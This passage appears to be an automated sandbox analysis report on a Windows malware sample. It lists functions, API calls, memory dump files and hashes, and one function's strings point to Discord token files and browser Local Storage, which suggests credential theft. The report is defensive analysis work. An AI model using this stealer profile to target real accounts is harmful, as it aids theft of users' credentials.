                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                Function 00411B80 Relevance: 4.5, APIs: 3, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 00411BAD
                                                                                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,771A8B60,?,?,004144A8), ref: 00411BC8
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,771A8B60,?), ref: 00411BD6
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                • Opcode ID: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                • Instruction ID: ca78cda8c920ae7da25bbd8c375dff46666a8013e4c9ac76a8aa62fa3564fd1b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B50184729096148BC300EF7CD94559EBBF0BB85725F014729ED94D7260E730AA99CBD3
                                                                                                                                                                                                                                                                                Function 00411CC0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                Function 00411550 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                • Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                • Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
                                                                                                                                                                                                                                                                                Function 00411520 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                                Function 00411F50 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SHFileOperationA.SHELL32(?), ref: 00411F94
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileOperation
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                • Opcode ID: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                • Instruction ID: dccbb589212da41187320816474e935ed05e6db7b62261ff46e18f4692dac182
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE07EB0608301ABE300DF46D55970BBBE0EB98308F40885DF0948B250D3B9C69C8B9B

                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                Function 00415700 Relevance: 63.5, APIs: 27, Strings: 9, Instructions: 493memorystringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
